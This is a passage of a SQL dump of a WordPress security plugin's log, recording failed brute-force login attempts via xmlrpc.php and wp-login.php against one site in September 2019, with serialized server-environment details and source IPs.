empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"53350\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHh524SfF9g@8lNlxw5KgAAAEM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568793063.269\";s:12:\"REQUEST_TIME\";s:10:\"1568793063\";}}','notice','2019-09-18 07:51:06','2019-09-18 07:51:03',18346808,19645344,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.167.184'),(24971,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.132.124.6\";s:11:\"REMOTE_PORT\";s:5:\"34452\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHh7FlvzIDnRn6zOHXXHAAAAI4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568793068.628\";s:12:\"REQUEST_TIME\";s:10:\"1568793068\";}}','notice','2019-09-18 07:51:10','2019-09-18 07:51:09',18258264,19555800,'https://bintara.com.my/xmlrpc.php',1,0,'185.132.124.6'),(24972,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.132.124.6\";s:11:\"REMOTE_PORT\";s:5:\"43420\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHjxVlvzIDnRn6zOHXZPgAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568793541.7731\";s:12:\"REQUEST_TIME\";s:10:\"1568793541\";}}','notice','2019-09-18 07:59:03','2019-09-18 07:59:02',17743496,19236064,'https://bintara.com.my/wp-login.php',1,0,'185.132.124.6'),(24973,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.132.124.6\";s:11:\"REMOTE_PORT\";s:5:\"44550\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHjyVlvzIDnRn6zOHXZRQAAAIE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568793545.6932\";s:12:\"REQUEST_TIME\";s:10:\"1568793545\";}}','notice','2019-09-18 07:59:07','2019-09-18 07:59:06',18258264,19555800,'https://bintara.com.my/xmlrpc.php',1,0,'185.132.124.6'),(24974,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"37082\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHlMSR0vdvYEIduPCLjTwAAAQc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568793905.9244\";s:12:\"REQUEST_TIME\";s:10:\"1568793905\";}}','notice','2019-09-18 08:05:07','2019-09-18 08:05:06',17739232,19230072,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(24975,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"37494\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHlNEQGijxhVPhG1M0ejgAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568793908.803\";s:12:\"REQUEST_TIME\";s:10:\"1568793908\";}}','notice','2019-09-18 08:05:10','2019-09-18 08:05:09',18258552,19554736,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.190.85'),(24976,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"41810\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHoUVlvzIDnRn6zOHXdQwAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568794705.4428\";s:12:\"REQUEST_TIME\";s:10:\"1568794705\";}}','notice','2019-09-18 08:18:26','2019-09-18 08:18:25',17741104,19232088,'https://bintara.com.my/wp-login.php',1,0,'103.15.226.14'),(24977,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"42424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHoU0QGijxhVPhG1M0f1gAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568794707.7779\";s:12:\"REQUEST_TIME\";s:10:\"1568794707\";}}','notice','2019-09-18 08:18:29','2019-09-18 08:18:28',18258728,19557976,'https://bintara.com.my/xmlrpc.php',1,0,'103.15.226.14'),(24978,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.95.54.138\";s:11:\"REMOTE_PORT\";s:5:\"59382\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHorEQGijxhVPhG1M0f7wAAABQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568794796.6218\";s:12:\"REQUEST_TIME\";s:10:\"1568794796\";}}','notice','2019-09-18 08:19:57','2019-09-18 08:19:57',17737464,19228344,'https://bintara.com.my/wp-login.php',1,0,'150.95.54.138'),(24979,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 